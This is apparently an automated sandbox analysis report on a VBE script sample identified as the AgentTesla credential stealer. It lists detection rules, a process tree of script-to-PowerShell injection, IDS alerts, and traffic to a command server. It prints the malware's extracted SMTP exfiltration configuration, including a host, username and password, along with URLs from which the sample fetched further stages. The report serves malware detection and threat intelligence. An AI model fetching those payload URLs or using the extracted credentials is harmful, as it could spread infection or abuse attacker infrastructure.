Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#150689.vbe

Overview

General Information

Sample name:Ref#150689.vbe
Analysis ID:1539284
MD5:3ee57f19875a1b263377d8ab4af8f677
SHA1:619eec8b7c7a819a87959fd9026dc58dfe965e68
SHA256:3fa9114a2d3fddc77550a3567cac63db1bf0c72bebe23d9ceed62cf47ea68c34
Tags:SPAM-ITAvbeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6200 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6580 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6804 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 2764 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6804" "2876" "2568" "2880" "0" "0" "2884" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 4676 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wermgr.exe (PID: 1436 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.RegSvcs.exe.370000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.RegSvcs.exe.370000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.2.RegSvcs.exe.370000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_6804.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xc55f:$e4: Get-WmiObject
                  • 0xc74e:$e4: Get-Process
                  • 0xc7a6:$e4: Start-Process

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6200, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", ProcessId: 6200, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6200, TargetFilename: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6200, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6176, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49764
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150689.vbe", ProcessId: 6200, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6580, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 6804, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-22T14:45:59.281919+020020301711A Network Trojan was detected192.168.2.549764162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-22T14:46:31.537759+020028555421A Network Trojan was detected192.168.2.549764162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-22T14:46:31.537759+020028552451A Network Trojan was detected192.168.2.549764162.254.34.31587TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-22T14:45:59.281919+020028400321A Network Trojan was detected192.168.2.549764162.254.34.31587TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 8.2.RegSvcs.exe.370000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49751 version: TLS 1.2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.5:49764 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49764 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49764 -> 162.254.34.31:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49764 -> 162.254.34.31:587
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49764 -> 162.254.34.31:587
                  Source: Joe Sandbox ViewIP Address: 144.91.79.54 144.91.79.54
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                  Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.5:49764 -> 162.254.34.31:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1210/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/thEh4UQ3nf0RsZGPSynf.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1210/s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/thEh4UQ3nf0RsZGPSynf.txt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/v HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /1210/file HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/$
                  Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/0G
                  Source: wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/
                  Source: wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/8
                  Source: wscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100564601.000001E89858F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/file
                  Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E89675B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/r
                  Source: wscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088250036.000001E89858A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074981941.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/s
                  Source: wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/thEh4UQ3nf0RsZGPSynf.txt
                  Source: wscript.exe, wscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2104531570.000001E898825000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2102491620.00000007D56F1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099250622.000001E896A98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/v
                  Source: wscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/v8
                  Source: wscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/1210/vs
                  Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/8
                  Source: wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/BA;0
                  Source: wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/D
                  Source: wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/L
                  Source: wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/P
                  Source: wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/T
                  Source: wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/e4
